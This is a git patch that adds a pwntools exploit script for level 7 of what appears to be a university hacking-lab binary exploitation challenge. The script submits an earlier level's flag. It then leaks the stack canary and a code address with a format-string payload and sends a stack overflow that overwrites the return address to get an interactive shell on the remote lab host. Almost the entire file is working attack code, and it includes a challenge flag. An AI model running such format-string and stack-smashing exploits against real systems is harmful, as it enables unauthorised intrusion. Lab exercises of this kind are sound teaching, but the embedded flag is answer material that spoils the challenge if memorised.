From 3e0859b09ee9bcc5aa75886a604b852bd92c9240 Mon Sep 17 00:00:00 2001
From: Eggert Jung <eggert.s.jung@wischhof13.de>
Date: Wed, 7 Jan 2026 14:26:07 +0100
Subject: [PATCH] 7

---
 4/level7/test.py | 82 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 82 insertions(+)
 create mode 100644 4/level7/test.py

diff --git a/4/level7/test.py b/4/level7/test.py
new file mode 100644
index 0000000..ff0aacb
--- /dev/null
+++ b/4/level7/test.py
@@ -0,0 +1,82 @@
+#!/usr/bin/env python3
+from pwn import *
+
+BINARY = "./level7"
+HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4007
+#HOST, PORT = "localhost", 4007
+
+elf = ELF(BINARY, checksec=False)
+
+def main():
+    # 1) start remote
+    p = remote(HOST, PORT)
+
+    # 2) read the question
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    payload = "hacklab{st4ck_c00k1es_w0nt_5top_y0u_G0HNiuT0}"
+    p.sendline(payload.encode())
+    print("sending: ", end='')
+    print(payload)
+
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    ##############
+
+    question = p.recv(timeout=999)
+    print("[+] got username prompt:", question.decode().strip())
+
+    # 3) build payload
+    #offset = 32
+    win    = elf.symbols['win']
+    #payload  = b"A"*offset
+    #payload += 0xa6#p64(win)
+    #payload += b"\n"
+    payload = "%7$p %9$p"
+    p.sendline(payload.encode())
+    print("sending: ", end='')
+    print(payload)
+
+    leak = p.recvline(timeout=999)
+    print("[+] leak:", leak)
+    canary  = int(leak[-35:-17],16)
+    pieaddr = int(leak[-16:-2],16)
+    print("[+] canary:", hex(canary))
+    print("[+] pieaddr:", hex(pieaddr))
+
+    question = p.recv(timeout=999)
+    print("[+] got username prompt:", question.decode().strip())
+
+    p.sendline("admin".encode())
+    print("sending username \"admin\"")
+
+    question = p.recvline(timeout=999)
+    print("[+] got username msg:", question.decode().strip())
+
+    question = p.recv(timeout=999)
+    print("[+] got password prompt:", question.decode().strip())
+
+    payload  = b"A"*40
+    payload += p64(canary)
+    payload += p64(pieaddr & 0xFFFFFFFFFFFFF000)
+    payload += p64((pieaddr & 0xFFFFFFFFFFFFF000)+0x229)
+    p.sendline(payload)
+    print("sending payload: ", payload)
+
+    question = p.recvline(timeout=999)
+    print("[+] got login msg:", question.decode().strip())
+
+
+    # 5) we should now have a shell
+    p.interactive()
+
+if __name__ == "__main__":
+    main()